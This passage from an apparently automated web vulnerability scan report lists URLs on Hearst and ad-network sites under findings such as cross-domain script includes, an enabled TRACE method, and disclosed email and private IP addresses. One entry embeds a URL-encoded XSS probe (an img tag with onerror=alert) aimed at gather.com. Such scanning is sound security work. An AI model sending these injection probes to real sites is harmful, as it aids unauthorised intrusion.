18.117. http://rad.msn.com/ADSAdClient31.dll

18.118. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js

18.119. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

18.120. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

18.121. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

18.122. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

18.123. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

18.124. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

18.125. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642

18.126. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

18.127. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

18.128. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

18.129. http://tag.admeld.com/nai-status

18.130. http://widget.newsinc.com/_fw/common/toppicks_common1.html

18.131. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js

18.132. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js

18.133. http://www.answerology.com/cobrands/delish/DelishLayout.js

18.134. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js

18.135. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js

18.136. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js

18.137. http://www.answerology.com/cobrands/realbeauty/RealBeautyLayout.js

18.138. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js

18.139. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js

18.140. http://www.answerology.com/cssjs/CoachesLayout.js

18.141. http://www.answerology.com/cssjs/Layout.js

18.142. http://www.answerology.com/index.aspx

18.143. http://www.answerology.com/index.aspx

18.144. http://www.answerology.com/index.aspx

18.145. http://www.facebook.com/plugins/activity.php

18.146. http://www.facebook.com/plugins/activity.php

18.147. http://www.facebook.com/plugins/fan.php

18.148. http://www.facebook.com/plugins/fan.php

18.149. http://www.facebook.com/plugins/fan.php

18.150. http://www.facebook.com/plugins/likebox.php

18.151. http://www.facebook.com/plugins/likebox.php

18.152. http://www.facebook.com/plugins/likebox.php

18.153. http://www.facebook.com/plugins/likebox.php

18.154. http://www.facebook.com/plugins/likebox.php

18.155. http://www.facebook.com/plugins/likebox.php

18.156. http://www.facebook.com/plugins/likebox.php

18.157. http://www.facebook.com/plugins/likebox.php

18.158. http://www.facebook.com/plugins/likebox.php

18.159. http://www.facebook.com/plugins/likebox.php

18.160. http://www.facebook.com/plugins/likebox.php

18.161. http://www.facebook.com/plugins/likebox.php

18.162. http://www.facebook.com/plugins/likebox.php

18.163. http://www.kampyle.com/feedback_form/ff-feedback-form.php

18.164. http://www.local.com/dart/

18.165. http://www.local.com/dart/

18.166. http://www.local.com/dart/

18.167. http://www.mathtag.com/cgi-bin/optout

18.168. http://www.mathtag.com/cgi-bin/optout

18.169. http://www.networkadvertising.org/yahoo_handler

18.170. http://www.pulse360.com/behavior/nai-opt-out.html

18.171. http://www.pulse360.com/behavior/nai-opt-out.html

18.172. http://www.seattlepi.com/flashtalking/ftlocal.html

18.173. http://www.tidaltv.com/optout/status.ashx

18.174. http://www.tidaltv.com/optout/verfiyoptout.ashx

18.175. http://www.tribalfusion.com/optout/verify.js

18.176. http://www.ugo.com/cm/ugo/js/ugo-global.js

18.177. http://www.zvents.com/misc/widgets/20645.js

19. Cross-domain script include

19.1. http://a.netmng.com/hic/

19.2. http://a.tribalfusion.com/j.ad

19.3. http://ad.amgdgt.com/ads/

19.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

19.5. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

19.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30

19.7. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31

19.8. http://afe.specificclick.net/

19.9. http://afe.specificclick.net/

19.10. http://afe.specificclick.net/

19.11. http://afe.specificclick.net/serve/v=5

19.12. http://afe.specificclick.net/serve/v=5

19.13. http://corporate.local.com/mk/get/advertising-opportunities

19.14. http://corporate.local.com/mk/get/contact-us

19.15. http://ellegirl.elle.com/

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://hearst.com/

19.18. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php

19.19. http://hearst.com/about-hearst/corporate-mark-e-aldam.php

19.20. http://hearst.com/about-hearst/index.php

19.21. http://hearst.com/newspapers/albany-times-union.php

19.22. http://hearst.com/newspapers/hearst-news-service.php

19.23. http://hearst.com/newspapers/index.php

19.24. http://hearst.com/newspapers/localedge.php

19.25. http://hearst.com/newspapers/metrix4media.php

19.26. http://hearst.com/newspapers/seattlepicom.php

19.27. http://hearst.com/newspapers/the-advocate.php

19.28. http://hearst.com/press-room/index.php

19.29. http://internetmarketing.localedge.com/

19.30. http://internetmarketing.localedge.com/wp-content/themes/images/default.png

19.31. http://js.zvents.com/javascripts/happy_partner_widgets.js

19.32. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

19.33. http://pbid.pro-market.net/engine

19.34. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

19.35. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

19.36. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

19.37. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

19.38. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

19.39. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

19.40. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642

19.41. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

19.42. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

19.43. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

19.44. http://widget.newsinc.com/_fw/common/toppicks_common1.html

19.45. http://www.answerology.com/

19.46. http://www.answerology.com/N

19.47. http://www.answerology.com/index.aspx

19.48. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg

19.49. http://www.answerology.com/uploaded-images/807708/40x37_thumb.jpg

19.50. http://www.delish.com/

19.51. http://www.donatemydress.org/

19.52. http://www.facebook.com/plugins/activity.php

19.53. http://www.facebook.com/plugins/fan.php

19.54. http://www.facebook.com/plugins/likebox.php

19.55. http://www.gather.com/

19.56. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d

19.57. http://www.gather.com/URI+SYNTAX+EXCEPTION

19.58. http://www.gather.com/a

19.59. http://www.kaboodle.com/

19.60. http://www.kampyle.com/feedback_form/ff-feedback-form.php

19.61. http://www.local.com/

19.62. http://www.localedge.com/

19.63. http://www.manilla.com/

19.64. http://www.misquincemag.com/

19.65. http://www.networkadvertising.org/managing/opt_out.asp

19.66. http://www.networkadvertising.org/managing/optout_results.asp

19.67. http://www.quickandsimple.com/

19.68. http://www.seattlepi.com/

19.69. http://www.seattlepi.com/flashtalking/ftlocal.html

19.70. http://www.seventeen.com/

19.71. http://www.stamfordadvocate.com/

19.72. http://www.thedailygreen.com/

19.73. http://www.timesunion.com/

19.74. http://www.ugo.com/

19.75. http://www.ugo.com/cm/ugo/js/ugo-global.js

19.76. http://www.ugo.com/xd_receiver.htm

19.77. http://www.zvents.com/misc/widgets/20645.js

20. TRACE method is enabled

20.1. http://1663.ic-live.com/

20.2. http://33across.com/

20.3. http://advertising.aol.com/

20.4. http://afe.specificclick.net/

20.5. http://amch.questionmarket.com/

20.6. http://bh.contextweb.com/

20.7. http://cache.specificmedia.com/

20.8. http://domdex.com/

20.9. http://fetchback.com/

20.10. http://hearst.com/

20.11. http://hfm.checkm8.com/

20.12. http://image2.pubmatic.com/

20.13. http://img.pulsemgr.com/

20.14. http://internetmarketing.localedge.com/

20.15. http://login.dotomi.com/

20.16. http://nai.ad.us-ec.adtechus.com/

20.17. http://nai.adserver.adtechus.com/

20.18. http://nai.adserverec.adtechus.com/

20.19. http://nai.adserverwc.adtechus.com/

20.20. http://nai.adsonar.com/

20.21. http://nai.adtech.de/

20.22. http://nai.advertising.com/

20.23. http://nai.btrll.com/

20.24. http://nai.glb.adtechus.com/

20.25. http://nai.tacoda.at.atwola.com/

20.26. http://nocookie.w55c.net/

20.27. http://notrack.adviva.net/

20.28. http://notrack.specificclick.net/

20.29. http://notrack.specificmedia.com/

20.30. http://optout.33across.com/

20.31. http://optout.adlegend.com/

20.32. http://optout.mookie1.com/

20.33. http://optout.mookie1.decdna.net/

20.34. http://optout.mookie1.decideinteractive.com/

20.35. http://optout.mookie1.dtfssearch.com/

20.36. http://optout.mookie1.pm14.com/

20.37. http://pixel.fetchback.com/

20.38. http://pixel.rubiconproject.com/

20.39. http://r.openx.net/

20.40. http://r.skimresources.com/

20.41. http://rt.legolas-media.com/

20.42. http://s.xp1.ru4.com/

20.43. http://seattlepi.ux.hearstdigitalnews.com/

20.44. http://sensor2.suitesmart.com/

20.45. http://stamfordadvocate.ux.hearstdigitalnews.com/

20.46. http://system.casalemedia.com/

20.47. http://tacoda.at.atwola.com/

20.48. http://test.ctpost.com/

20.49. http://usucmweb.dotomi.com/

20.50. http://www.addthis.com/

20.51. http://www.casalemedia.com/

20.52. http://www.chron.com/

20.53. http://www.crosspixel.net/

20.54. http://www.fetchback.com/

20.55. http://www.gather.com/

20.56. http://www.localedge.com/

20.57. http://www.mathtag.com/

20.58. http://www.seattlepi.com/

20.59. http://www.stamfordadvocate.com/

20.60. http://www.timesunion.com/

20.61. http://www.tribalfusion.com/

20.62. http://www.ugo.com/

21. Email addresses disclosed

21.1. http://ads.adbrite.com/adserver/vdi/762701

21.2. http://ads.adbrite.com/adserver/vdi/762701

21.3. http://advertising.aol.com/finish/0/4/1/

21.4. http://advertising.aol.com/finish/1/4/1/

21.5. http://advertising.aol.com/finish/2/4/1/

21.6. http://advertising.aol.com/finish/3/4/1/

21.7. http://advertising.aol.com/finish/4/4/1/

21.8. http://advertising.aol.com/finish/5/4/1/

21.9. http://advertising.aol.com/finish/6/4/1/

21.10. http://advertising.aol.com/finish/7/4/1/

21.11. http://advertising.aol.com/finish/8/4/1/

21.12. http://advertising.aol.com/token/0/2/1812733584/

21.13. http://advertising.aol.com/token/0/3/295357155/

21.14. http://advertising.aol.com/token/1/1/819977518/

21.15. http://advertising.aol.com/token/1/3/1696897902/

21.16. http://advertising.aol.com/token/2/2/1032347115/

21.17. http://advertising.aol.com/token/2/3/1397978719/

21.18. http://advertising.aol.com/token/3/1/8239370/

21.19. http://advertising.aol.com/token/3/3/1557169105/

21.20. http://advertising.aol.com/token/4/1/1128450710/

21.21. http://advertising.aol.com/token/4/3/708534695/

21.22. http://advertising.aol.com/token/5/2/1348442932/

21.23. http://advertising.aol.com/token/5/3/1649521156/

21.24. http://advertising.aol.com/token/6/1/1581270199/

21.25. http://advertising.aol.com/token/6/3/882857095/

21.26. http://advertising.aol.com/token/7/1/52531776/

21.27. http://advertising.aol.com/token/7/3/1777313403/

21.28. http://advertising.aol.com/token/8/1/585997419/

21.29. http://advertising.aol.com/token/8/3/144927758/

21.30. http://cdn.uproxx.com/wp-content/themes/ur_v3/js/jquery.colorbox.js

21.31. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/style.css

21.32. http://corporate.local.com/mk/get/advertising-opportunities

21.33. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/s_code.js

21.34. http://internetmarketing.localedge.com/js/jquery.hoverIntent.minified.js

21.35. http://static.localedge.com/common/js/api/localedge.js

21.36. http://static.localedge.com/common/js/api/localedge.localedgemedia.js

21.37. http://www.gather.com/js/niftycube.js

21.38. http://www.local.com/js/s_code.js

21.39. http://www.misquincemag.com/cm/shared/scripts/jquery.json.js

21.40. http://www.realage.com/

21.41. http://www.seattlepi.com/

21.42. http://www.seattlepi.com/flashtalking/ftlocal.html

21.43. http://www.seventeen.com/cm/shared/scripts/jquery.selectbox.js

21.44. http://www.stamfordadvocate.com/

21.45. http://www.stamfordadvocate.com/js/omniture/s_code.js

21.46. http://www.thedailygreen.com/cm/shared/scripts/jquery.json.js

21.47. http://www.zvents.com/misc/widgets/20645.js

22. Private IP addresses disclosed

22.1. http://external.ak.fbcdn.net/safe_image.php

22.2. http://external.ak.fbcdn.net/safe_image.php

22.3. http://external.ak.fbcdn.net/safe_image.php

22.4. http://external.ak.fbcdn.net/safe_image.php

22.5. http://external.ak.fbcdn.net/safe_image.php

22.6. http://external.ak.fbcdn.net/safe_image.php

22.7. http://external.ak.fbcdn.net/safe_image.php

22.8. http://external.ak.fbcdn.net/safe_image.php

22.9. http://external.ak.fbcdn.net/safe_image.php

22.10. http://external.ak.fbcdn.net/safe_image.php

22.11. http://external.ak.fbcdn.net/safe_image.php

22.12. http://external.ak.fbcdn.net/safe_image.php

22.13. http://external.ak.fbcdn.net/safe_image.php

22.14. http://hfm.checkm8.com/adam/cm8adam_1_call.js

22.15. http://hfm.checkm8.com/adam/cm8adam_1_call.js

22.16. http://hfm.checkm8.com/adam/detect

22.17. http://hfm.checkm8.com/adam/detect

22.18. http://hfm.checkm8.com/adam/detected

22.19. http://hfm.checkm8.com/adam/detected

22.20. http://hfm.checkm8.com/dispatcher_scripts/browserDataDetect.js

22.21. http://hfm.checkm8.com/dispatcher_scripts/browserDataDetect.js

22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

22.23. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

22.24. http://static.ak.connect.facebook.com/connect.php/en_US

22.25. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

22.26. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

22.27. http://www.answerology.com/

22.28. http://www.answerology.com/N

22.29. http://www.answerology.com/N

22.30. http://www.answerology.com/index.aspx

22.31. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg

22.32. http://www.answerology.com/uploaded-images/807708/40x37_thumb.jpg

22.33. http://www.facebook.com/extern/login_status.php

22.34. http://www.facebook.com/extern/login_status.php

22.35. http://www.facebook.com/extern/login_status.php

22.36. http://www.facebook.com/extern/login_status.php

22.37. http://www.facebook.com/extern/login_status.php

22.38. http://www.facebook.com/extern/login_status.php

22.39. http://www.facebook.com/extern/login_status.php

22.40. http://www.facebook.com/extern/login_status.php

22.41. http://www.facebook.com/extern/login_status.php

22.42. http://www.facebook.com/extern/login_status.php

22.43. http://www.facebook.com/extern/login_status.php

22.44. http://www.facebook.com/extern/login_status.php

22.45. http://www.facebook.com/extern/login_status.php

22.46. http://www.facebook.com/extern/login_status.php

22.47. http://www.facebook.com/extern/login_status.php

22.48. http://www.facebook.com/extern/login_status.php

22.49. http://www.facebook.com/extern/login_status.php

22.50. http://www.facebook.com/extern/login_status.php

22.51. http://www.facebook.com/extern/login_status.php

22.52. http://www.facebook.com/extern/login_status.php

22.53. http://www.facebook.com/plugins/activity.php

22.54. http://www.facebook.com/plugins/activity.php

22.55. http://www.facebook.com/plugins/activity.php

22.56. http://www.facebook.com/plugins/activity.php

22.57. http://www.facebook.com/plugins/activity.php

22.58. http://www.facebook.com/plugins/activity.php

22.59. http://www.facebook.com/plugins/activity.php

22.60. http://www.facebook.com/plugins/activity.php

22.61. http://www.facebook.com/plugins/activity.php

22.62. http://www.facebook.com/plugins/activity.php

22.63. http://www.facebook.com/plugins/fan.php

22.64. http://www.facebook.com/plugins/fan.php

22.65. http://www.facebook.com/plugins/fan.php

22.66. http://www.facebook.com/plugins/like.php

22.67. http://www.facebook.com/plugins/like.php

22.68. http://www.facebook.com/plugins/like.php

22.69. http://www.facebook.com/plugins/like.php

22.70. http://www.facebook.com/plugins/like.php

22.71. http://www.facebook.com/plugins/like.php

22.72. http://www.facebook.com/plugins/like.php

22.73. http://www.facebook.com/plugins/like.php

22.74. http://www.facebook.com/plugins/like.php

22.75. http://www.facebook.com/plugins/like.php

22.76. http://www.facebook.com/plugins/like.php

22.77. http://www.facebook.com/plugins/like.php

22.78. http://www.facebook.com/plugins/like.php

22.79. http://www.facebook.com/plugins/like.php

22.80. http://www.facebook.com/plugins/like.php

22.81. http://www.facebook.com/plugins/like.php

22.82. http://www.facebook.com/plugins/like.php

22.83. http://www.facebook.com/plugins/like.php

22.84. http://www.facebook.com/plugins/like.php

22.85. http://www.facebook.com/plugins/like.php

22.86. http://www.facebook.com/plugins/like.php

22.87. http://www.facebook.com/plugins/like.php

22.88. http://www.facebook.com/plugins/like.php

22.89. http://www.facebook.com/plugins/like.php

22.90. http://www.facebook.com/plugins/like.php

22.91. http://www.facebook.com/plugins/like.php

22.92. http://www.facebook.com/plugins/like.php

22.93. http://www.facebook.com/plugins/like.php

22.94. http://www.facebook.com/plugins/like.php

22.95. http://www.facebook.com/plugins/like.php

22.96. http://www.facebook.com/plugins/like.php

22.97. http://www.facebook.com/plugins/like.php

22.98. http://www.facebook.com/plugins/like.php

22.99. http://www.facebook.com/plugins/like.php

22.100. http://www.facebook.com/plugins/like.php

22.101. http://www.facebook.com/plugins/like.php

22.102. http://www.facebook.com/plugins/like.php

22.103. http://www.facebook.com/plugins/like.php

22.104. http://www.facebook.com/plugins/like.php

22.105. http://www.facebook.com/plugins/like.php

22.106. http://www.facebook.com/plugins/like.php

22.107. http://www.facebook.com/plugins/like.php

22.108. http://www.facebook.com/plugins/like.php

22.109. http://www.facebook.com/plugins/like.php

22.110. http://www.facebook.com/plugins/like.php

22.111. http://www.facebook.com/plugins/like.php

22.112. http://www.facebook.com/plugins/like.php

22.113. http://www.facebook.com/plugins/like.php

22.114. http://www.facebook.com/plugins/like.php

22.115. http://www.facebook.com/plugins/like.php

22.116. http://www.facebook.com/plugins/like.php

22.117. http://www.facebook.com/plugins/likebox.php

22.118. http://www.facebook.com/plugins/likebox.php

22.119. http://www.facebook.com/plugins/likebox.php

22.120. http://www.facebook.com/plugins/likebox.php

22.121. http://www.facebook.com/plugins/likebox.php

22.122. http://www.facebook.com/plugins/likebox.php

22.123. http://www.facebook.com/plugins/likebox.php

22.124. http://www.facebook.com/plugins/likebox.php

22.125. http://www.facebook.com/plugins/likebox.php

22.126. http://www.facebook.com/plugins/likebox.php

22.127. http://www.facebook.com/plugins/likebox.php

22.128. http://www.facebook.com/plugins/likebox.php

22.129. http://www.facebook.com/plugins/likebox.php

23. Credit card numbers disclosed

24. Robots.txt file

24.1. http://1663.ic-live.com/goat.php

24.2. http://33across.com/api/opt-out.php

24.3. http://a.netmng.com/opt-status.php

24.4. http://a.rad.msn.com/ADSAdClient31.dll

24.5. http://a.rfihub.com/nai_check_status.gif

24.6. http://a.tribalfusion.com/j.ad

24.7. http://ad.amgdgt.com/ads/

24.8. http://ad.auditude.com/adserver

24.9. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo

24.10. http://ad.turn.com/server/ads.js

24.11. http://ad.yieldmanager.com/imp

24.12. http://adreq.bizographics.com/i

24.13. http://ads.amgdgt.com/ads/opt-out

24.14. http://ads.undertone.com/fc.php

24.15. http://adserver.teracent.net/tase/ad

24.16. http://adsfac.us/ag.asp

24.17. http://advertising.aol.com/nai/nai.php

24.18. http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js

24.19. http://amch.questionmarket.com/dt/s/28067/0.php

24.20. http://api.twitter.com/1/statuses/user_timeline.json

24.21. http://api.zap2it.com/tvlistings/zcConnector.jsp

24.22. http://as.serving-sys.com/OptOut/nai_optout_results.aspx

24.23. http://as1.suitesmart.com/102386/G14531.js

24.24. http://b.rad.msn.com/ADSAdClient31.dll

24.25. http://b.scorecardresearch.com/r

24.26. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.27. http://c.brightcove.com/services/viewer/federated_f9

24.28. http://cdn.turn.com/server/ddc.htm

24.29. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/jquery.fancybox.1.3.4.css

24.30. http://ce.lijit.com/merge

24.31. http://cim.meebo.com/cim

24.32. http://cm.g.doubleclick.net/pixel

24.33. http://cm.npc-hearst.overture.com/js_1_0/

24.34. http://dc.kaboodle.com/b/ss/kaboodlecom/1/H.2-pdv-2/s98178625190630

24.35. http://dis.criteo.com/dis/optoutstatus.aspx

24.36. http://domdex.com/nai_optout_status.php

24.37. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js

24.38. http://ellegirl.elle.com/

24.39. http://events.adchemy.com/visitor/auuid/nai-status

24.40. http://events.seattlepi.com/partner_json/search

24.41. http://events.stamfordadvocate.com/partner_json/search

24.42. http://fetchback.com/serve/fb/optout

24.43. http://fls.doubleclick.net/activityi

24.44. http://g-pixel.invitemedia.com/gmatcher

24.45. http://googleads.g.doubleclick.net/pagead/ads

24.46. http://hearst.112.2o7.net/b/ss/hearstconnecticutglobal,hearstctadvocate/1/H.17/s95699573238380

24.47. http://hearst.com/

24.48. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0

24.49. http://hfm.checkm8.com/adam/detect

24.50. http://img.pulsemgr.com/optout

24.51. http://internetmarketing.localedge.com/

24.52. http://load.exelator.com/load/OptOut.php

24.53. http://loadus.exelator.com/load/

24.54. http://login.dotomi.com/ucm/UCMController

24.55. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

24.56. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s91569553883746

24.57. http://nai.ad.us-ec.adtechus.com/nai/daa.php

24.58. http://nai.adserver.adtechus.com/nai/daa.php

24.59. http://nai.adserverec.adtechus.com/nai/daa.php

24.60. http://nai.adserverwc.adtechus.com/nai/daa.php

24.61. http://nai.adsonar.com/nai/daa.php

24.62. http://nai.adtech.de/nai/daa.php

24.63. http://nai.advertising.com/nai/daa.php

24.64. http://nai.btrll.com/nai/status

24.65. http://nai.glb.adtechus.com/nai/daa.php

24.66. http://nai.tacoda.at.atwola.com/nai/daa.php

24.67. http://o.sa.aol.com/b/ss/aolamn,aolsvc/1/H.21/s96658798141233

24.68. http://omnituretrack.local.com/b/ss/ic-hulk2010production/1/H.17/s91523811360821

24.69. http://optout.33across.com/api/

24.70. http://optout.cognitivematch.com/optoutStatus

24.71. http://optout.crwdcntrl.net/optout/check.php

24.72. http://optout.invitemedia.com:9030/check_optout

24.73. http://optout.media6degrees.com/orbserv/NAIStatus

24.74. http://optout.mxptint.net/naistatus.ashx

24.75. http://origin.chron.com/apps/audit/ads.gif

24.76. http://p.opt.fimserve.com/nai_check.jsp

24.77. http://pbid.pro-market.net/engine

24.78. http://pixel.fetchback.com/serve/fb/optout

24.79. http://pixel.quantserve.com/api/segments.json

24.80. http://ps2.newsinc.com/players/GetZoneID/90009.xml

24.81. http://r.skimresources.com/api/

24.82. http://r.turn.com/r/optout

24.83. http://rad.msn.com/ADSAdClient31.dll

24.84. http://rt.legolas-media.com/lgrt

24.85. http://s.xp1.ru4.com/coop

24.86. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf

24.87. http://s0.2mdn.net/666472/Amex_Midas_NoBlackout_728x90.swf

24.88. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYz9oDINjaAyoFWO0AAAEyBk_tAAD_AQ

24.89. http://safebrowsing.clients.google.com/safebrowsing/gethash

24.90. http://sana.newsinc.com/sana.html

24.91. http://sensor2.suitesmart.com/sensor4.js

24.92. http://services.hearstmags.com/registration/get_hearst_user.js

24.93. http://spe.atdmt.com/ds/UXUJ3UMJ3NYS/WaveForChange_BTS2011/JJ_NW_300x250_Spin.swf

24.94. http://syn.verticalacuity.com/varw/getPromo

24.95. http://t.invitemedia.com/track_imp

24.96. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642

24.97. http://tcr.tynt.com/javascripts/Tracer.js

24.98. http://test.ctpost.com/beacon/error

24.99. http://tm.verticalacuity.com/vat/visitT

24.100. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.101. http://um.simpli.fi/an

24.102. http://us.bc.yahoo.com/b

24.103. http://vms.msn.com/vms.aspx

24.104. http://www.adbrite.com/mb/nai_optout_check.php

24.105. http://www.addthis.com/api/nai/status

24.106. http://www.bizographics.com/nai/status

24.107. http://www.burstnet.com/cgi-bin/opt_out_check.cgi

24.108. http://www.casalemedia.com/cgi-bin/naiOptout.cgi

24.109. http://www.chron.com/apps/adWiz/adWiz.mpl

24.110. http://www.delish.com/

24.111. http://www.facebook.com/plugins/like.php

24.112. http://www.fetchback.com/resources/naicheck.php

24.113. http://www.gather.com/

24.114. http://www.google-analytics.com/__utm.gif

24.115. http://www.google.com/cse/brand

24.116. http://www.kaboodle.com/

24.117. http://www.local.com/

24.118. http://www.localedge.com/wdpsearch/localedgebusinesssearch.htm

24.119. http://www.manilla.com/

24.120. http://www.mathtag.com/cgi-bin/optout

24.121. http://www.mediaplex.com/status_pure.php

24.122. http://www.meebo.com/cim/sandbox.php

24.123. http://www.misquincemag.com/

24.124. http://www.pulse360.com/behavior/nai-opt-out.html

24.125. http://www.quickandsimple.com/

24.126. http://www.realage.com/default.aspx

24.127. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi

24.128. http://www.seattlepi.com/

24.129. http://www.seventeen.com/

24.130. http://www.stamfordadvocate.com/

24.131. http://www.thedailygreen.com/

24.132. http://www.timesunion.com/

24.133. http://www.tribalfusion.com/optout/verify.js

24.134. http://www.ugo.com/cm/ugo/css/ugo-global.css

24.135. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&

24.136. http://www.zvents.com/misc/widgets/20645.js

24.137. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act

24.138. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759

25. HTML does not specify charset

25.1. http://a.collective-media.net/

25.2. http://a.collective-media.net/favicon.ico

25.3. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3

25.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

25.5. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6

25.6. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714

25.7. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2

25.8. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3

25.9. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30

25.10. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31

25.11. http://ad.doubleclick.net/pfadx/seventeen_cim/

25.12. http://adreq.bizographics.com/i

25.13. http://adsfac.us/ag.asp

25.14. http://advertising.aol.com/nai/nai.php

25.15. http://amch.questionmarket.com/adscgen/d_layer.php

25.16. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

25.17. http://amch.questionmarket.com/adscgen/st.php

25.18. http://an.tacoda.net/an/slf.htm

25.19. http://api.uproxx.com/ulink/feed

25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.21. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68

25.22. http://contextweb.pixel.invitemedia.com/context_sync

25.23. http://corporate.local.com/mk/get/advertising-opportunities

25.24. http://corporate.local.com/mk/get/contact-us

25.25. http://d3.zedo.com/jsc/d3/ff2.html

25.26. http://fls.doubleclick.net/activityi

25.27. http://hearst.com/

25.28. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php

25.29. http://hearst.com/about-hearst/corporate-mark-e-aldam.php

25.30. http://hearst.com/about-hearst/index.php

25.31. http://hearst.com/newspapers/albany-times-union.php

25.32. http://hearst.com/newspapers/hearst-news-service.php

25.33. http://hearst.com/newspapers/index.php

25.34. http://hearst.com/newspapers/localedge.php

25.35. http://hearst.com/newspapers/metrix4media.php

25.36. http://hearst.com/newspapers/seattlepicom.php

25.37. http://hearst.com/newspapers/the-advocate.php

25.38. http://hearst.com/press-room/index.php

25.39. http://hearst.com/press-room/pr-20110817a.php

25.40. http://hfm.checkm8.com/adam/detect

25.41. http://loadus.exelator.com/load/net.php

25.42. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

25.43. http://metrix4media.com/

25.44. http://networkadvertising.org/consumer/opt_out.asp

25.45. http://pbid.pro-market.net/engine

25.46. http://sana.newsinc.com/sana.html

25.47. http://sensor2.suitesmart.com/sensor4.js

25.48. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us

25.49. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us

25.50. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

25.51. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626

25.52. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642

25.53. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100

25.54. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626

25.55. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642

25.56. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100

25.57. http://tags.bluekai.com/site/2187
